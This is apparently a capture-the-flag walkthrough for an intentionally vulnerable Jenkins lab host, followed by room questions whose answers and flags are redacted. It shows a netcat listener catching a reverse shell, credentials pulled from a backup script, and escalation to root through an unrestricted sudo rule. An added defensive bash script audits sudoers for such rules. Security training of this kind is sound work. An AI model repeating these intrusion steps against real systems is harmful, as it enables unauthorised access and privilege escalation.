We are dealing with a server that is vulnerable by design. It contains misconfigurations and has been implemented with poor or simply nonexistent security practices.
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 6996
listening on [any] 6996 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.63.220] 52726
whoami
jenkins
Successful reverse shell
┌──(kali㉿kali)-[~]
└─$ ssh tracy@10.10.63.220
tracy@10.10.63.220's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Dec 13 05:20:26 AM UTC 2023
System load: 0.00537109375 Processes: 114
Usage of /: 48.0% of 9.75GB Users logged in: 1
Memory usage: 37% IPv4 address for eth0: 10.10.63.220
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
41 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Nov 22 19:59:37 2023 from 10.18.65.106
tracy@jenkins:~$ sudo -l
[sudo] password for tracy:
Matching Defaults entries for tracy on jenkins:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User tracy may run the following commands on jenkins:
(ALL : ALL) ALL
tracy@jenkins:~$ sudo su
root@jenkins:/home/tracy#
The (ALL : ALL) ALL line in the output says that tracy can run any command, as any user and group, through sudo. In other words, the account was created with full administrative privileges. As such, we can just enter the command sudo su, and we're root!
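The audit a defender would run for this finding, as an added example that is not part of the original write-up: it lists every non-root account that holds an unrestricted sudo rule, directly or through a group. The function name, the file arguments and the sample sudoers and group contents are constructed, and that tracy receives the rule through the %sudo group is an assumption.

```bash
#!/usr/bin/env bash
# Added example: report every non-root account with an unrestricted sudo rule,
# whether granted directly or through a group such as %sudo.
# Usage: unrestricted_sudo_accounts SUDOERS_FILE GROUP_FILE
# Assumption: include directives in the sudoers file are not followed.
unrestricted_sudo_accounts() {
    awk '
    pass == 1 { members[$1] = $4; next }   # group(5): name:x:gid:member,member
    /^[ \t]*(#|@|Defaults|$)/ || /_Alias/ { next }  # comments, includes, settings, aliases
    index($0, "=") == 0 { next }           # not a user specification
    {
        who = $1
        rhs = substr($0, index($0, "=") + 1)
        runas = "root"                      # sudo default when no (runas) is given
        if (match(rhs, /\([^)]*\)/)) {
            runas = substr(rhs, RSTART + 1, RLENGTH - 2)
            rhs = substr(rhs, RSTART + RLENGTH)
        }
        gsub(/[A-Z_]+:/, "", rhs)           # drop tags such as NOPASSWD:
        gsub(/[ \t]/, "", rhs); gsub(/[ \t]/, "", runas)
        # Keep only rules whose command list is exactly ALL and that run as root/ALL.
        if (rhs != "ALL" || runas !~ /^(ALL|root)(:|$)/) next
        if (who ~ /^%/) {                   # group rule: expand to its members
            n = split(members[substr(who, 2)], m, ",")
            for (i = 1; i <= n; i++) print m[i] " via " who
        } else if (who != "root") {         # root holding ALL is expected
            print who " direct"
        }
    }' pass=1 FS=: "$2" pass=2 FS=' ' "$1" | sort -u
}

# Constructed sample data modelled on the host in this write-up (not real files).
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
cat > "$demo_dir/sudoers" <<'EOF'
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL : ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
EOF
cat > "$demo_dir/group" <<'EOF'
sudo:x:27:tracy
jenkins:x:118:
EOF
unrestricted_sudo_accounts "$demo_dir/sudoers" "$demo_dir/group"
```

Accounts whose primary group is the privileged group are recorded in passwd(5) rather than in the member list of group(5), so check those separately.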
What is the default port for Jenkins?
[REDACTED]
What is the password of the user tracy?
[REDACTED]
Can be found in a backup file.
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 6996
listening on [any] 6996 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.63.220] 52726
whoami
jenkins
cd /opt/scripts
ls
backup.sh
cat backup.sh
#!/bin/sh
.
.
.
tar czvf /var/lib/jenkins/backup.tar.gz /var/lib/jenkins/backup/
/bin/sleep 5
username=[REDACTED]
password=[REDACTED]
What's the root flag?
[REDACTED]
Can be found when we get root access using tracy's password.
root@jenkins:/# cd root
root@jenkins:~# ls
[REDACTED] snap
root@jenkins:~# cat flag.txt
[REDACTED]
What is the error message when you log in as tracy again and try sudo -l after its removal from the sudoers group?
Sorry, user tracy may not run sudo on jenkins.
What's the SSH flag?
[REDACTED]
Can be found in the SSH config file.
What's the Jenkins flag?
[REDACTED]
Can be found in the backup config file.